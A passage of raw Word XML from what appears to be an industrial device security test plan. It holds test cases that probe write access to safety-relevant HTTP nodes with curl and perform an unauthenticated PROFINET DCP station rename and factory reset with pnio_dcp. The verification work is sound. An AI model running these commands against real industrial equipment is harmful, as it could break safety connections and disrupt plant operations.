      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC4B6A" w14:textId="77777777" w:rsidR="00CF00AD" w:rsidRPr="006D5B99" w:rsidRDefault="00CF00AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FF7ED9" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">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6D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73AB0452"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5398A972" w14:textId="7E391AD5" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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RQ-011 </w:t>
            </w:r>
            <w:r w:rsidR="00756A55" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidR="00756A55" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">CR 2.1 </w:t>
            </w:r>
            <w:r w:rsidR="00756A55" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D66413" w14:textId="364B975A" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B0F0C6" w14:textId="54F613D3" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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SVV-1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B1AD62B" w14:textId="15EA9C45" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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the design intent that safety-relevant parameters cannot be written via the non-safety information interface (read-only), so that interface is not an authorization bypass. (Positive control verification.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E933B36"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writable-looking endpoints on the information interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31536C12" w14:textId="77777777" w:rsidR="00080DEF"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lastRenderedPageBreak/>
              <w:t>Attempt writes to safety-relevant nodes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="566C2EAE" w14:textId="6865C621" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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each is rejected / read-only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10294E0D" w14:textId="77777777" w:rsidR="00080DEF"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all safety-parameter write attempts via the information interface are refused. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="222D2C41" w14:textId="1A60D71E" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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any safety parameter is writable via that interface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C52419C" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AABDFC2" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">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6D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DAF9B4" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F7D708" w14:textId="0E870EDD" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00DA31A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TC-RQ011-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0D21" w:rsidRPr="006D5B99"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1E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D21">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326876E3" w14:textId="01C7771C" w:rsidR="001E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D21">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4558"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>NV1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0D21" w:rsidRPr="006D5B99"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1E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D21">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA85972" w14:textId="2F61613C" w:rsidR="001E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D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curl, ZAP (CM-004, optional for automated endpoint enumeration).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0D21" w:rsidRPr="006D5B99"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1E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D21">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45DC08DF"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254D3731"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Attempt write access to all safety-relevant nodes listed in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E4B2706"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209_SRIO_CompSpec_Module_Com §5.3.1 (only /devicetag/applicationtag is</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4424CAF3"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documented as writable; all others should be read-only):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528AA7D7"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http://$SRIO/safecom/f_address/setdata -d '{"value":123}' -w "%{http_code}\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C55BB99" w14:textId="77777777" w:rsidR="001E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D21">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http://$SRIO/io/do/port7/pin4/digital_output/setdata -d '{"value":true}' -w "%{http_code}\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E05581" w14:textId="700AA3E9" w:rsidR="001E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D2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curl -s -X POST http://$SRIO/devicetag/applicationtag/setdata -d '"factoryXYZ"' -w "%{http_code}\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0D21" w:rsidRPr="006D5B99"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195A3624" w:rsidR="001E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D21">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="205A9EBC" w14:textId="7F0A2446" w:rsidR="001E0D21" w:rsidRPr="006D5B99" w:rsidRDefault="001E0D21" w:rsidP="001E0D2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all safety-relevant nodes return “read-only” / an error code; only non-critical fields (e.g. applicationtag) are writable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C4D45F2" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRPr="006D5B99" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D79FCBF" w14:textId="19C7C961" w:rsidR="00AB13AD" w:rsidRPr="006D5B99" w:rsidRDefault="00230B52" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ011-02 - </w:t>
      </w:r>
      <w:r w:rsidR="000768DD" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unauthenticated Configuration-Protocol Factory Reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D8BC3"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2D3585"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671D8BE5" w14:textId="1C66A2B1" w:rsidR="00233097" w:rsidRPr="006D5B99"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000768DD" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 1.2 / CR 2.1 </w:t>
            </w:r>
            <w:r w:rsidR="000768DD" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset G, Asset F, Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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1F8F5F12" w14:textId="5362CA14" w:rsidR="00233097" w:rsidRPr="006D5B99"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Spoofing + Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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2EBDBAD4" w14:textId="00F0FF4B" w:rsidR="00233097" w:rsidRPr="006D5B99"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r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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296DD7D7" w14:textId="39D08B0B" w:rsidR="00233097" w:rsidRPr="006D5B99"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6D5B99"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4C98197F"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Baseline the device's communication identity and operating state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0216F9C1"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peer node, issue a configuration identify, then a set (change communication identity) and a reset-to-factory.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467801B5" w14:textId="77777777"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whether the actions succeed without authentication.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04E65720" w14:textId="51DC520A" w:rsidR="006861EF"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Observe the safety impact (loss of the safety connection </w:t>
            </w:r>
            <w:r w:rsidR="007F73A6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> passivation).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DCA3E6" w14:textId="13A90CFE" w:rsidR="00233097" w:rsidRPr="006D5B99"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higher reset modes if supported.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60CE9BA2"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set/reset requires authentication or is refused from an unauthorized node. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C18B34F" w14:textId="77777777" w:rsidR="006861EF"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reset succeeds unauthenticated. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2564E747" w14:textId="46574E0E" w:rsidR="00233097" w:rsidRPr="006D5B99"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Bound: the impact is on communication parameters (</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> passivation), not silent safety-parameter modification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E541653" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="006D5B99" w:rsidRDefault="00233097" w:rsidP="00233097">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE93B8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6D5B99"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5BFDEF74"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143E8CE6" w14:textId="12119499" w:rsidR="00233097" w:rsidRPr="006D5B99" w:rsidRDefault="002373D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TC-RQ011-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A91223" w:rsidRPr="006D5B99"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A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10F77A14" w14:textId="0D1755FE" w:rsidR="00A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="163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A91223" w:rsidRPr="006D5B99"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A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EBE9689" w14:textId="534AAE90" w:rsidR="00A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2167"/>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Scapy or pnio_dcp (pip install pnio_dcp), Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A91223" w:rsidRPr="006D5B99"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A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AF39321"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pip install pnio_dcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D603FF0"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Baseline: read the current device name/IP via DCP-Identify</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7081CA0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print(c.identify_all())"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E315C45"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06AD8D2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commentRangeStart w:id="1"/>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># 2. DCP-Set (name change) WITHOUT any credentials:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0D9D1C"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c.set_name_of_station('AA:BB:CC:DD:EE:FF', 'test-hijack')"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645129F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8C4C18E"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DCP-Reset-to-Factory (Mode 2, mandatory):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F42149D"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python3 -c "import pnio_dcp; c = pnio_dcp.DCP('eth1'); c.reset_to_factory('AA:BB:CC:DD:EE:FF')"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="351DB56F" w14:textId="77777777" w:rsidR="00A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A4B7304" w14:textId="4FC63A77" w:rsidR="00A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A912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4. Check the TIA watch table for connection loss / passivation.</w:t>
            </w:r>
            <w:commentRangeEnd w:id="1"/>
            <w:r w:rsidR="00000645" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="1"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A91223" w:rsidRPr="006D5B99"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56F62854" w:rsidR="00A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1561882A" w14:textId="5EB8171C" w:rsidR="00A91223" w:rsidRPr="006D5B99" w:rsidRDefault="00A91223" w:rsidP="00A91223">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2910"/>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set/reset succeeds without credentials; the impact is limited to communication parameters </w:t>
            </w:r>
            <w:r w:rsidR="0005537A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> --&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> passivation (no silent safety-parameter modification).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CEBC5FC" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRPr="006D5B99" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
